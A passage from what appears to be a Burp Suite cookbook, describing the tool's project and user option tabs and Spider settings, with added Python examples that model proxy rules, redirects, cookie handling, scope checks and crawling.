roots as Builtin Object Token). Buttons: View..., Edit Trust..., Import..., 
Export..., Delete or Distrust..., OK] 


6. In the dialog box that pops up, check the Trust this CA to identify 
websites box, and click OK. Click OK on the Certificate Manager dialog as 
well: 


[Dialog: You have been asked to trust a new Certificate Authority (CA). Do you 
want to trust "PortSwigger CA" for the following purposes? 
[x] Trust this CA to identify websites. 
[ ] Trust this CA to identify email users. 
Before trusting this CA for any purpose, you should examine its certificate 
and its policy and procedures (if available). 
View: Examine CA certificate] 


Close all dialog boxes and restart Firefox. If installation was successful, you 
should now be able to visit any HTTPS URL in your browser while proxying the 
traffic through Burp without any security warnings. 


Setting Project options 


Project options allow a tester to save or set configurations specific to a project or 
scoped target. There are multiple subtabs available under the Project options 
tab, which include Connections, HTTP, SSL, Sessions, and Misc. Many of these 
options are required for penetration testers when assessing specific targets, 
which is why they are covered here. 


How to do it... 


In this book, we will not be using many of these features but it is still important 
to know of their existence and understand their purpose: 


[Screenshot: Burp main tabs Target | Proxy | Spider | Scanner | Intruder | 
Repeater | Sequencer | Decoder | Comparer | Extender | Project options, with 
the Project options subtabs Connections | HTTP | SSL | Sessions | Misc] 


The Connections tab 


Under the Connections tab, a tester has the following options: 


• Platform Authentication: This provides an override button in the event the 
tester wants the Project options related to the type of authentication used 
against the target application to supersede any authentication settings within 
the user options. 


After clicking the checkbox to override the user's options, the tester is 
presented with a table enabling authentication options (for example, 
Basic, NTLMv2, NTLMv1, and Digest) specific to the target application. 
Should a tester ever need this option, the destination host is commonly 
set to the wildcard *: 


[Screenshot: the Platform Authentication panel: "These settings are configured within user options but can be overridden here for this specific project", an Override user options checkbox, "These settings let you configure Burp to automatically carry out platform authentication to destination web servers", a Do platform authentication checkbox, a table with Destination host, Type, Username, Domain, and Domain hostname columns (Add, Edit, Remove buttons), and a Prompt for credentials on platform authentication failure checkbox]


• Upstream proxy servers: It provides an override button in the event the 
tester wants the Project options related to upstream proxy servers used 
against the target application to supersede any proxy settings contained 
within the user options. 


After clicking the checkbox to override the user's options, the tester is 
presented with a table enabling upstream proxy options specific to this 
project. Clicking the Add button displays a pop-up box called Add 
upstream proxy rule. This rule is specific to the target application's 
environment. This feature is very helpful if the target application's 
environment is fronted with a web proxy requiring a different set of 
credentials than the application login: 


[Screenshot: the Add upstream proxy rule dialog: "Enter the details of the upstream proxy rule. You can use wildcards to specify destination hosts (* matches zero or more characters, ? matches any character except a dot). Leave the proxy host blank to connect directly for the specified destination host." Fields: Destination host (may include wildcards), Proxy host (leave blank to connect directly), Proxy port, Authentication type (None), Username, Password, Domain, Domain hostname; OK and Cancel buttons]
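As an added example (not code from the book or from Burp itself), the following Python shows how the wildcard semantics stated in the dialog can be applied to a destination host, and how a rule table is consulted in order, with a blank proxy host meaning a direct connection. The rule table, host names and ports are constructed for the example.

```python
import re

# Constructed rule table in the shape of Burp's "Add upstream proxy rule" dialog:
# (destination host pattern, proxy host, proxy port). A blank proxy host means
# "connect directly". Rules are consulted in order and the first match wins, so
# the more specific patterns are listed first.
UPSTREAM_RULES = [
    ("intranet.example.test", "", 0),                     # direct connection
    ("api-?.example.test", "proxy2.example.test", 3128),  # '?' = one non-dot char
    ("*.example.test", "proxy.example.test", 8080),       # '*' = zero or more chars
    ("*", "proxy.example.test", 8080),                    # catch-all
]


def host_pattern_to_regex(pattern):
    """Translate a Burp-style destination host pattern into a regex:
    '*' matches zero or more characters, '?' matches any character except
    a dot, everything else is literal. Host names match case-insensitively."""
    parts = []
    for ch in pattern:
        if ch == "*":
            parts.append(".*")
        elif ch == "?":
            parts.append("[^.]")
        else:
            parts.append(re.escape(ch))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def resolve_upstream(dest_host, rules=UPSTREAM_RULES):
    """Return (proxy_host, proxy_port) for the first rule matching dest_host.
    Returns None when that rule has a blank proxy host (direct connection)
    or when no rule matches at all."""
    for host_pattern, proxy_host, proxy_port in rules:
        if host_pattern_to_regex(host_pattern).match(dest_host):
            return (proxy_host, proxy_port) if proxy_host else None
    return None


if __name__ == "__main__":
    for host in ("intranet.example.test", "api-1.example.test",
                 "api-12.example.test", "www.example.org"):
        print(host, "->", resolve_upstream(host))
```

Note that the order of the rules matters: if the catch-all or the `*.example.test` row were listed first, the more specific rows would never be reached, which is the usual cause of traffic unexpectedly going through (or bypassing) a proxy.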


• SOCKS Proxy: It provides an override button in the event the tester wishes 
for Project options related to the SOCKS Proxy configuration used against 
the target application to supersede any SOCKS Proxy settings within the 
user options. 


After clicking the checkbox to override user options, the tester is 
presented with a form to configure a SOCKS Proxy specific to this 
project. In some circumstances, web applications must be accessed through 
a SOCKS proxy, a protocol that relays TCP connections (optionally with 
authentication) at the socket level rather than at the HTTP level: 


[Screenshot: the SOCKS Proxy panel: "These settings are configured within user options but can be overridden here for this specific project", an Override user options checkbox, and "These settings let you configure Burp to use a SOCKS proxy. This setting is applied at the TCP level and all outbound requests will be sent via this proxy. If you have configured rules for upstream HTTP proxy servers, then requests to upstream proxies will be sent via the SOCKS proxy configured here."]


• Timeouts: It allows for timeout settings for different network scenarios, 
such as failing to resolve a domain name: 


[Screenshot: the Timeouts panel: "These settings specify the timeouts to be used for various network tasks. Values are in seconds. Set an option to zero or leave it blank to never timeout that task." Normal: 120; Open-ended responses: 10; Domain name resolution: 300; Failed domain name resolution: 60]


• Hostname Resolution: It allows entries similar to a hosts file on a local 
machine to override the Domain Name System (DNS) resolution: 


[Screenshot: the Hostname Resolution panel: "Add entries here to override your computer's DNS resolution", with a table of Enabled, Hostname, and IP address columns]


• Out-of-Scope Requests: It provides rules to Burp regarding out-of-scope 
requests. The default setting, Use suite scope [defined in Target tab], is 
the most commonly used: 


[Screenshot: the Out-of-Scope Requests panel: "This feature can be used to prevent Burp from issuing any out-of-scope requests, including those made via the proxy", with the radio buttons Drop all out-of-scope requests, Use suite scope [defined in Target tab] (selected), and Use custom scope]


The HTTP tab 


Under the HTTP tab, a tester has the following options: 


• Redirections: It provides rules for Burp to follow when redirections are 
configured. Most commonly, the default settings are used here: 


[Screenshot: the Redirections panel: "These settings control the types of redirections that Burp will understand in situations where it is configured to follow redirections. When following redirections, understand the following types:" 3xx status code with Location header (checked), Refresh header (checked), Meta refresh tag (checked), JavaScript-driven (unchecked), Any status code with Location header (unchecked)]
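The five redirection types in that panel are not all equally easy to recognise. As an added illustration (not code from the book or from Burp), the following Python classifies a captured response according to those five types and honours a settings dictionary shaped like the panel's checkboxes. The JavaScript detection is deliberately a narrow set of idioms, since recognising arbitrary client-side redirects needs a script engine; the regular expressions and sample responses are constructed for the example.

```python
import re

# The five redirection types from the Redirections panel, in the order Burp lists them.
THREE_XX_LOCATION = "3xx status code with Location header"
REFRESH_HEADER = "Refresh header"
META_REFRESH = "Meta refresh tag"
JAVASCRIPT = "JavaScript-driven"
ANY_LOCATION = "Any status code with Location header"

# Mirrors the checkbox states shown in the panel: the first three are enabled,
# JavaScript-driven and any-status Location are not.
DEFAULT_SETTINGS = {
    THREE_XX_LOCATION: True, REFRESH_HEADER: True, META_REFRESH: True,
    JAVASCRIPT: False, ANY_LOCATION: False,
}

# "<seconds>; url=<target>", the syntax shared by the Refresh header and the meta tag.
_REFRESH_RE = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)
_META_RE = re.compile(
    r"<meta[^>]*http-equiv\s*=\s*['\"]?refresh['\"]?[^>]*content\s*=\s*['\"]([^'\"]*)['\"]",
    re.IGNORECASE | re.DOTALL)
# A deliberately narrow set of client-side redirect idioms (constructed for the example).
_JS_RE = re.compile(
    r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]"
    r"|location\.(?:replace|assign)\(\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE)


def detect_redirect(status, headers, body, settings=None):
    """Classify one HTTP response. headers is a dict with lower-case names.
    Returns (redirection type, target) for the first enabled type the response
    exhibits, or None when it is not a redirection the current settings follow."""
    settings = settings or DEFAULT_SETTINGS
    location = headers.get("location")
    if location and 300 <= status < 400 and settings[THREE_XX_LOCATION]:
        return (THREE_XX_LOCATION, location)
    refresh = headers.get("refresh")
    if refresh and settings[REFRESH_HEADER]:
        m = _REFRESH_RE.match(refresh)
        if m:
            return (REFRESH_HEADER, m.group(1))
    if settings[META_REFRESH]:
        m = _META_RE.search(body)
        if m:
            target = _REFRESH_RE.match(m.group(1))
            if target:
                return (META_REFRESH, target.group(1))
    if settings[JAVASCRIPT]:
        m = _JS_RE.search(body)
        if m:
            return (JAVASCRIPT, m.group(1) or m.group(2))
    # A Location header on a non-3xx response is only followed when asked to.
    if location and settings[ANY_LOCATION]:
        return (ANY_LOCATION, location)
    return None


if __name__ == "__main__":
    print(detect_redirect(302, {"location": "/home"}, ""))
    print(detect_redirect(200, {}, "<script>window.location.href = '/js';</script>",
                          {**DEFAULT_SETTINGS, JAVASCRIPT: True}))
```

The order of the checks matches the panel's order, so a response carrying both a 3xx status and a meta refresh is reported as the former, which is also what a browser acts on first.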


• Streaming Responses: It provides configurations related to responses that 
stream indefinitely. Mostly, the default settings are used here: 


[Screenshot: the Streaming Responses panel: "These settings are used to specify URLs returning responses that stream indefinitely. The Proxy will pass these responses straight through to the client. Repeater will update the response panel as the response is received. Other tools will ignore streaming responses. In order to view the contents of streaming responses within Burp, you need to check the 'store streaming responses' option." A Use advanced scope control checkbox; a table of Enabled and Prefix columns with Add, Edit, Remove, Paste URL, and Load ... buttons; Store streaming responses (may result in large temp files) (checked); Strip chunked encoding metadata in streaming responses]


• Status 100 Responses: It provides a setting for Burp to handle HTTP status 
code 100 responses. Most commonly, the default settings are used here: 


[Screenshot: the Status 100 Responses panel: "These settings control the way Burp handles HTTP responses with status 100", with Understand 100 Continue responses (checked) and Remove 100 Continue headers (unchecked)]


The SSL tab 


Under the SSL tab, a tester has the following options: 


• SSL Negotiations: When Burp communicates with a target application over 
SSL, this option provides the ability to use preconfigured SSL ciphers or to 
specify different ones: 


[Screenshot: the SSL Negotiation panel: "These settings control the SSL protocols and ciphers that Burp will use when performing SSL negotiation with upstream servers. If you are experiencing problems with SSL negotiation, you can use these settings to request use of specific protocols or ciphers. Use these options with caution as misconfiguration may break all your outgoing SSL connections." Radio buttons: Use the default protocols and ciphers of your Java installation (selected), Use custom protocols and ciphers. SSL Negotiation Workarounds: Automatically select compatible SSL parameters on negotiation failure (checked), Allow unsafe renegotiation (required for some client certificates) (unchecked), Disable SSL session resume (unchecked)]


If a tester wishes to customize the ciphers, they will click the Use custom 
protocols and ciphers radio button. A table appears allowing selection of 
the protocols and ciphers that Burp can use in the communication with the 
target application. These choices affect every outgoing SSL connection Burp 
makes, so enable legacy protocols such as SSLv3 only when a target supports 
nothing newer: 


[Screenshot: the SSL Negotiation panel with Use custom protocols and ciphers selected. SSL Protocols table (Select all / Select none; Enabled, Protocol): SSLv2Hello (unchecked), SSLv3 (checked), TLSv1, TLSv1.1, TLSv1.2 (checked). SSL Ciphers table (Enabled, Cipher): TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384, TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384, TLS_RSA_WITH_AES_256_CBC_SHA256, TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384, TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384, TLS_DHE_RSA_WITH_AES_256_CBC_SHA256, TLS_DHE_DSS_WITH_AES_256_CBC_SHA256, and further entries. SSL Negotiation Workarounds: Automatically select compatible SSL parameters on negotiation failure (checked), Allow unsafe renegotiation (required for some client certificates) (unchecked)]


• Client SSL Certificates: It provides an override button in the event the 
tester must use a client-side certificate against the target application. This 
option will supersede any client-side certificate configured within the user 
options. 


After clicking the checkbox to override user options, the tester is 
presented with a table to configure a client-side certificate specific to this 
project. You must have the private key to your client-side certificate in 
order to successfully import it into Burp: 


[Screenshot: the Client SSL Certificates panel: "These settings are configured within user options but can be overridden here for this specific project", an Override user options checkbox (checked), "These settings let you configure the client SSL certificates that Burp will use when a destination host requests one. Burp will use the first certificate in the list whose host configuration matches the name of the host being contacted. You can double-click on an item to view the full details of the certificate." and a table with Enabled, Host, Type, Alias, and Subject columns with Up and Down buttons]


• Server SSL Certificates: It provides a listing of server-side certificates. A 
tester can double-click any of these line items to view the details of each 
certificate: 


[Screenshot: the Server SSL Certificates panel: "This panel shows a list of the unique SSL certificates received from web servers. Double-click an item to show the full details of the certificate." The entries listed:]

Host | Name | Issuer 
safebrowsing.googleapis.com | *.googleapis.com | Google Internet Authority G3 
www.google.com | www.google.com | Google Internet Authority G3 
getpocket.cdn.mozilla.net | *.cdn.mozilla.net | DigiCert SHA2 Secure Server CA 
safebrowsing.googleapis.com | *.googleapis.com | Google Internet Authority G3 
tiles.services.mozilla.com | *.services.mozilla.com | DigiCert SHA2 Secure Server CA 
incoming.telemetry.mozilla.org | *.telemetry.mozilla.org | DigiCert SHA2 Secure Server CA 
shavar.services.mozilla.com | shavar.services.mozilla.com | DigiCert SHA2 Secure Server CA 


The Sessions tab 


This book will cover recipes on all functionality contained within the Sessions 
tab in Chapter 10, Working with Burp Macros and Extensions. A review of each 
of these sections within the Sessions tab is provided here for completeness. 


Under the Sessions tab, a tester has the following options: 


• Session Handling Rules: It provides the ability to configure customized 
session-handling rules while assessing a web application: 


[Screenshot: the Session Handling Rules panel: "You can define session handling rules to make Burp perform specific actions when making HTTP requests. Each rule has a defined scope (for particular tools, URLs or parameters), and can perform actions such as adding session cookies, logging in to the application, or checking session validity. Before each request is issued, Burp applies in sequence each of the rules that are in-scope for the request." A table with Enabled, Description, and Tools columns holding the default rule "Use cookies from Burp's cookie jar" for Spider and Scanner, with Add, Edit, Remove, Duplicate, Up, and Down buttons. "To monitor or troubleshoot the behavior of your session handling rules, you can use the sessions tracer to view in detail the results of processing each rule." Open sessions tracer button]


• Cookie Jar: It provides a listing of cookies, domains, paths, and 
name/value pairs captured by Burp Proxy (by default): 


[Screenshot: the Cookie Jar panel: "Burp maintains a cookie jar that stores all of the cookies issued by visited web sites. Session handling rules can use and update these cookies to maintain valid sessions with applications that are being tested. You can use the settings below to control how Burp automatically updates the cookie jar based on traffic from particular tools." Monitor the following tools' traffic to update the cookie jar: Proxy (checked), plus Scanner, Repeater, Spider, Intruder, Sequencer, and Extender checkboxes; Open cookie jar button]
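The two panels above (Session Handling Rules and Cookie Jar) describe one mechanism: a jar that is filled from responses and a rule, scoped by tool and URL, that puts the jar's cookies on outgoing requests. As an added example (not code from the book or from Burp), the following Python models the default "Use cookies from Burp's cookie jar" rule for the Spider and Scanner tools. The jar honours Domain and Path attributes when deciding which cookies cover a URL; the host names and cookie values are constructed for the example.

```python
from urllib.parse import urlsplit


class CookieJar:
    """A minimal cookie jar keyed by (domain, path, name), which is how the
    Open cookie jar view lists its entries."""

    def __init__(self):
        self.cookies = {}

    def update_from_response(self, request_url, set_cookie_headers):
        """Record the cookies a response to request_url issued. Domain and Path
        attributes are honoured; otherwise the request host and the directory
        of the request path are used, as browsers do."""
        parts = urlsplit(request_url)
        for header in set_cookie_headers:
            pieces = [p.strip() for p in header.split(";")]
            name, _, value = pieces[0].partition("=")
            domain = (parts.hostname or "").lower()
            path = parts.path.rsplit("/", 1)[0] or "/"
            for attr in pieces[1:]:
                key, _, val = attr.partition("=")
                if key.lower() == "domain" and val:
                    domain = val.lstrip(".").lower()
                elif key.lower() == "path" and val:
                    path = val
            self.cookies[(domain, path, name.strip())] = value.strip()

    def cookies_for(self, url):
        """Return the name=value pairs whose domain and path cover url."""
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        path = parts.path or "/"
        pairs = []
        for (domain, cpath, name), value in self.cookies.items():
            domain_ok = host == domain or host.endswith("." + domain)
            path_ok = path == cpath or path.startswith(cpath.rstrip("/") + "/")
            if domain_ok and path_ok:
                pairs.append(f"{name}={value}")
        return pairs


class SessionRule:
    """One session handling rule: a description, the tools it applies to, the URL
    prefixes that define its scope, and the action of adding the jar's cookies."""

    def __init__(self, description, tools, url_prefixes, jar):
        self.description = description
        self.tools = set(tools)
        self.url_prefixes = tuple(url_prefixes)
        self.jar = jar

    def in_scope(self, tool, url):
        return tool in self.tools and any(url.startswith(p) for p in self.url_prefixes)

    def apply(self, url, headers):
        """Add the jar's cookies to the request, keeping any the request already carries."""
        existing = [c.strip() for c in headers.get("Cookie", "").split(";") if c.strip()]
        names = {c.split("=", 1)[0] for c in existing}
        fresh = [c for c in self.jar.cookies_for(url) if c.split("=", 1)[0] not in names]
        if existing or fresh:
            headers["Cookie"] = "; ".join(existing + fresh)
        return headers


def prepare_request(tool, url, headers, rules):
    """Before a request is issued, apply in sequence every rule that is in scope
    for it, the evaluation order described in the Session Handling Rules panel."""
    headers = dict(headers)
    for rule in rules:
        if rule.in_scope(tool, url):
            headers = rule.apply(url, headers)
    return headers


if __name__ == "__main__":
    jar = CookieJar()   # constructed sample cookies for the example
    jar.update_from_response("http://app.example.test/login",
                             ["PHPSESSID=abc123; Path=/; HttpOnly", "pref=dark; Path=/settings"])
    rule = SessionRule("Use cookies from Burp's cookie jar", ["Spider", "Scanner"],
                       ["http://app.example.test/"], jar)
    print(prepare_request("Scanner", "http://app.example.test/index.php", {}, [rule]))
    print(prepare_request("Repeater", "http://app.example.test/index.php", {}, [rule]))
```

The second call shows the scope check at work: Repeater is not among the rule's tools, so the request leaves without a Cookie header, which is exactly the situation the sessions tracer is there to diagnose.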


• Macros: It provides the ability for a tester to record a sequence of requests 
previously performed in order to automate activities while interacting with 
the target application: 


[Screenshot: the Macros panel: "A macro is a sequence of one or more requests. You can use macros within session handling rules to perform tasks such as logging in to the application, obtaining anti-CSRF tokens, etc." with an empty macro table and its editing buttons (including Up and Down)]


The Misc tab 


Under the Misc tab, a tester has the following options: 


• Scheduled Tasks: It provides the ability to schedule an activity at specific 
times: 


[Screenshot: the Scheduled Tasks panel: "These settings let you specify tasks that Burp will perform automatically at defined times or intervals", with an Add button and a table of Time, Repeat, and Task columns]


When the Add button is clicked, a pop-up reveals the types of activities 
available for scheduling: 


[Screenshot: the task type dialog, "Select the type of task you want to run": Scan from a URL (selected), Pause active scanning, Resume active scanning, Spider from a URL, Pause spidering, Resume spidering, Save state; Cancel and Next buttons]


• Burp Collaborator Server: It provides the ability to use a service external 
to the target application for the purposes of discovering vulnerabilities in 
the target application. This book will cover recipes related to Burp 
Collaborator in Chapter 11, Implementing Advanced Topic Attacks. A 
review of this section is provided here for completeness: 


[Screenshot: the Burp Collaborator Server panel: "Burp Collaborator is an external service that Burp can use to help discover many kinds of vulnerabilities. You can use the default Collaborator server provided by PortSwigger, or deploy your own instance. You should read the full documentation for this feature and decide which option is most appropriate for you." Radio buttons: Use the default Collaborator server, Don't use Burp Collaborator, Use a private Collaborator server (with Server location and Polling location (optional) fields); Run health check button]


• Logging: It provides the ability to log all requests and responses or filter 
the logging based on a particular tool. If selected, the user is prompted for a 
file name and location to save the log file on the local machine: 


[Screenshot: the Logging panel: "These settings control logging of HTTP requests and responses", with Requests and Responses checkboxes for All tools, Proxy, Spider, Scanner, Intruder, Repeater, Sequencer, and Extender]


Setting user options 


User options allow a tester to save or set configurations specific to how they 
want Burp to be configured upon startup. There are multiple sub-tabs available 
under the user options tab, which include Connections, SSL, Display, and Misc. 
For recipes in this book, we will not be using any user options. However, the 
information is reviewed here for completeness. 


How to do it... 


Using Burp user options, let's configure your Burp UI in a manner best suited to 
your penetration-testing needs. Each of the items under the Connections tab is 
already covered in the Project options section of this chapter, hence, we will 
directly start with the SSL tab. 


The SSL tab 


Under the SSL tab, a tester has the following options: 


• Java SSL Options: It provides the ability to configure the Java security 
libraries used by Burp for SSL connections. The default values are most 
commonly used: 


[Screenshot: the Java SSL Options panel: "These settings can be used to enable certain SSL features that might be needed to successfully connect to some servers", with the checkboxes Enable algorithms blocked by Java security policy (requires restart) and Disable Java SNI extension (requires restart)]


• Client SSL Certificate: This section is already covered in the Project 
options section of this chapter. 


The Display tab 


Under the Display tab, a tester has the following options: 


• User Interface: It provides the ability to modify the default font and size of 
the Burp UI itself: 


[Screenshot: the User Interface panel: "These settings let you control the appearance of Burp's user interface", with Font size (11) and Look and feel (Nimbus) selectors]


• HTTP Message Display: It provides the ability to modify the default font 
and size used for all HTTP messages shown within the message editor: 


[Screenshot: the HTTP Message Display panel: "These settings let you control how HTTP messages are displayed within the raw HTTP viewer/editor", with Font: Courier New 11pt (Change font... button), Highlight request parameters (checked), Highlight response syntax (checked), and Analyze and display AMF messages (use with caution) (unchecked)]


• Character Sets: It provides the ability to override the character set Burp 
detects, either to use a specific set or to display messages as raw bytes: 


[Screenshot: the Character Sets panel: "These settings control how Burp handles different character sets when displaying raw HTTP messages. Note that some glyphs are not supported by all fonts. If you need to use an extended or unusual character set, you should first try a system font such as Courier New or Dialog." Radio buttons: Recognize automatically based on message headers (selected), Use the platform default (windows-1252), Display as raw bytes, Use a specific character set (Big5)]


• HTML Rendering: It controls how HTML pages will display from the 
Render tab available on an HTTP response: 


[Screenshot: the HTML Rendering panel: "These settings control how Burp handles in-tool rendering of HTML content", with an Allow renderer to make HTTP requests (for images, etc.) checkbox (checked)]


The Misc tab 


Under the Misc tab, a tester has the following options: 


• Hotkeys: It lets a user configure hotkeys for commonly-executed 
commands: 


[Screenshot: the Hotkeys panel: "These settings let you configure hotkeys for common actions. These include item-specific actions such as "Send to Repeater", global actions such as "Switch to Proxy", and in-editor actions such as "Cut" and "Undo"." The table begins:]

Action | Hotkey 
Send to Repeater | Ctrl+R 
Send to Intruder | Ctrl+I 
Forward intercepted Proxy message | Ctrl+F 
Toggle Proxy interception | Ctrl+T 
Switch to Target | Ctrl+Shift+T 
Switch to Proxy | Ctrl+Shift+P 
Switch to Scanner | Ctrl+Shift+S 
Switch to Intruder | Ctrl+Shift+I 


• Automatic Project Backup [disk projects only]: It provides the ability to 
determine how often backup copies of project files are made. By default, 
when using Burp Professional, backups are set to occur every 30 minutes: 


[Screenshot: the Automatic Project Backup [disk projects only] panel: "Automatic project backup saves a copy of the Burp project file periodically in the background", with a Delete backup file on clean exit checkbox]


• Temporary Files Location: It provides the ability to change the location 
where temporary files are stored while running Burp: 


[Screenshot: the Temporary Files Location panel: "These settings let you configure where Burp stores its temporary files. Changes will take effect the next time Burp starts up." Radio buttons: Use default system temp directory (selected), Use custom location (Choose folder ... button)]


• Proxy Interception: It provides the ability to always enable or always 
disable proxy intercept upon initially starting Burp: 


[Screenshot: the Proxy Interception panel: "This setting controls the state of proxy interception at startup." Enable interception at startup: Always enable, Always disable (selected), Restore setting from when Burp was last closed]


• Proxy History Logging: It provides the ability to customize prompting of 
out-of-scope items when the target scope changes: 


[Screenshot: the Proxy History Logging panel: "This setting controls whether adding items to Target scope will automatically set the Proxy option to stop sending out-of-scope items to the history or other Burp tools." When items are added to Target scope: Stop sending out-of-scope items to Proxy history and other Burp tools, Prompt for action (selected), Do nothing]


• Performance Feedback: It provides anonymous data to PortSwigger 
regarding Burp performance: 


[Screenshot: the Performance Feedback panel: "You can help improve Burp by submitting anonymous feedback about Burp's performance." A Submit anonymous feedback about Burp's performance checkbox. "Feedback only contains technical information about Burp's internal functioning, and does not identify you in any way. If you do report a bug via email, you can help us diagnose any problems that your instance of Burp has encountered by including your debug ID." A Debug ID field with a Copy button, and a Report bug button]


Spidering with Spider 


Spidering is another term for mapping out or crawling a web application. This 
mapping exercise is necessary to uncover links, folders, and files present within 
the target application. 


In addition to crawling, Burp Spider can also submit forms in an automated 
fashion. Spidering should occur prior to scanning, since pentesters wish to 
identify all possible paths and functionality prior to looking for vulnerabilities. 


Burp provides an on-going spidering capability. This means that as a pentester 
discovers new content, Spider will automatically run in the background looking 
for forms, files, and folders to add to Target | Site map. 


There are two tabs available in the Spider module of Burp Suite, Control and 
Options, which we will study in the Getting ready section of this recipe. 


Getting ready 


Using the OWASP Mutillidae II application found within the OWASP BWA VM, 
we will configure and use Burp Spider to crawl through the application. 


The Control tab 


Under the Control tab, a tester has the following options: 


• Spider Status: It provides the ability to turn the spidering functionality on 
or off (paused). It also allows us to monitor queued-up Spider requests 
along with bytes transferred, and so on. This section allows any forms 
queued to be cleared by clicking the Clear queues button: 


[Screenshot: the Spider Status panel: "Use these settings to monitor and control Burp Spider. To begin spidering, browse to the target application, then right-click one or more nodes in the target site map, and choose "Spider this host / branch"." Spider is paused and Clear queues buttons; Requests made: 0; Bytes transferred: 0; Requests queued: 0; Forms queued: 0]


• Spider Scope: It provides the ability to set the Spider Scope, either based 
on the Target | Site map tab or a customized scope: 


[Screenshot: the Spider Scope panel with the radio buttons Use suite scope [defined in Target tab] (selected) and Use custom scope]


If the Use custom scope radio button is clicked, two tables appear, 
allowing the tester to define URLs to be included and excluded from 
scope: 


[Screenshot: the Spider Scope panel with Use custom scope selected, a Use advanced scope control checkbox, and Include in scope and Exclude from scope tables, each with a Prefix column]
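The Include/Exclude tables here and the Out-of-Scope Requests panel under Project options both depend on the same scope evaluation: a URL is in scope when it matches an include row and no exclude row. As an added example (not code from the book or from Burp), the following Python implements both the simple prefix mode and an "advanced scope control" row (protocol, host regex, port, file regex), and then partitions a request list the way "Drop all out-of-scope requests" would. The rule layout mirrors the columns of the Burp tables, but the class and the sample URLs are constructed for the example; the Mutillidae URL is the one used later in this recipe.

```python
import re
from urllib.parse import urlsplit


class ScopeRule:
    """One row of an 'advanced scope control' table (a constructed shape that
    mirrors Burp's columns): protocol ('http', 'https' or 'any'), a host regex,
    an optional port, and a regex for the file part (path plus query string)."""

    def __init__(self, host_regex, protocol="any", port=None, file_regex=".*"):
        self.protocol = protocol
        self.host = re.compile(host_regex, re.IGNORECASE)
        self.port = port
        self.file = re.compile(file_regex)

    def matches(self, url):
        u = urlsplit(url)
        if self.protocol != "any" and u.scheme != self.protocol:
            return False
        if not self.host.fullmatch(u.hostname or ""):
            return False
        port = u.port or (443 if u.scheme == "https" else 80)
        if self.port is not None and port != self.port:
            return False
        file_part = (u.path or "/") + ("?" + u.query if u.query else "")
        return self.file.match(file_part) is not None


def prefix_rule(prefix):
    """Simple mode: a table row is a URL prefix such as
    http://192.168.56.101/mutillidae/ and matches everything beneath it."""
    u = urlsplit(prefix)
    return ScopeRule(host_regex=re.escape(u.hostname or ""), protocol=u.scheme or "any",
                     port=u.port, file_regex=re.escape(u.path or "/") + ".*")


class TargetScope:
    """Include and Exclude tables. A URL is in scope when it matches at least one
    include rule and no exclude rule, which is how Burp evaluates the two tables."""

    def __init__(self, include, exclude=()):
        self.include = list(include)
        self.exclude = list(exclude)

    @classmethod
    def from_prefixes(cls, include_prefixes, exclude_prefixes=()):
        return cls([prefix_rule(p) for p in include_prefixes],
                   [prefix_rule(p) for p in exclude_prefixes])

    def is_in_scope(self, url):
        return (any(r.matches(url) for r in self.include)
                and not any(r.matches(url) for r in self.exclude))


def split_by_scope(urls, scope):
    """Partition requests the way 'Drop all out-of-scope requests' would:
    returns (issued, dropped)."""
    issued = [u for u in urls if scope.is_in_scope(u)]
    dropped = [u for u in urls if not scope.is_in_scope(u)]
    return issued, dropped


if __name__ == "__main__":
    scope = TargetScope.from_prefixes(["http://192.168.56.101/mutillidae/"],
                                      ["http://192.168.56.101/mutillidae/set-up-database.php"])
    print(split_by_scope(["http://192.168.56.101/mutillidae/index.php?page=login.php",
                          "http://192.168.56.101/mutillidae/set-up-database.php",
                          "http://example.org/"], scope))
```

Excluding set-up-database.php is the kind of row a tester adds so that crawling and scanning never hit a page that resets the target's state; the exclude table is checked after the include table, so the more specific exclusion wins.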


The Options tab 


Under the Options tab, a tester has the following options: 


• Crawler Settings: It provides the ability to limit how many links deep 
Spider will follow, and identifies basic web content for Spider to request on 
a website, such as the robots.txt file: 


[Screenshot: the Crawler Settings panel: "These settings control the way the Spider crawls for basic web content." Check robots.txt (checked); Detect custom "not found" responses (checked); Ignore links to non-text content (checked); Request the root of all directories (checked); Make a non-parameterized request to each dynamic page (checked); Maximum link depth: 5; Maximum parameterized requests per URL: 50]
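To make those settings concrete, here is an added example (not code from the book or from Burp): a small breadth-first crawler over a constructed in-memory site that honours the Crawler Settings shown above, including the link-depth limit, the per-URL cap on parameterized requests, skipping non-text content, requesting the root of every directory, issuing a non-parameterized request for each dynamic page, and treating robots.txt as a source of paths to discover. The site contents, URLs and the `fetch` stand-in are constructed for the example.

```python
import re
from collections import deque
from urllib.parse import urljoin, urlsplit

# Constructed stand-in for the target application: URL -> (content type, body).
SITE = {
    "http://app.test/": ("text/html",
        '<a href="/docs/guide.html">docs</a> <a href="/index.php?page=login.php">login</a> '
        '<a href="/logo.png">logo</a>'),
    "http://app.test/robots.txt": ("text/plain", "User-agent: *\nDisallow: /admin/\n"),
    "http://app.test/docs/": ("text/html", '<a href="/docs/guide.html">guide</a>'),
    "http://app.test/docs/guide.html": ("text/html", '<a href="/docs/deep/1.html">d1</a>'),
    "http://app.test/docs/deep/1.html": ("text/html", '<a href="/docs/deep/2.html">d2</a>'),
    "http://app.test/docs/deep/2.html": ("text/html", '<a href="/docs/deep/3.html">d3</a>'),
    "http://app.test/docs/deep/3.html": ("text/html", ""),
    "http://app.test/index.php": ("text/html", ""),
    "http://app.test/index.php?page=login.php": ("text/html",
        '<a href="/index.php?page=home.php">home</a>'),
    "http://app.test/index.php?page=home.php": ("text/html", ""),
    "http://app.test/admin/": ("text/html", '<a href="/admin/panel.php">panel</a>'),
    "http://app.test/admin/panel.php": ("text/html", ""),
}
NON_TEXT = re.compile(r"\.(png|jpg|gif|css|js|pdf|zip)$", re.IGNORECASE)
LINK = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def fetch(url):
    """Stand-in for an HTTP GET against SITE: returns (status, content type, body)."""
    if url in SITE:
        ctype, body = SITE[url]
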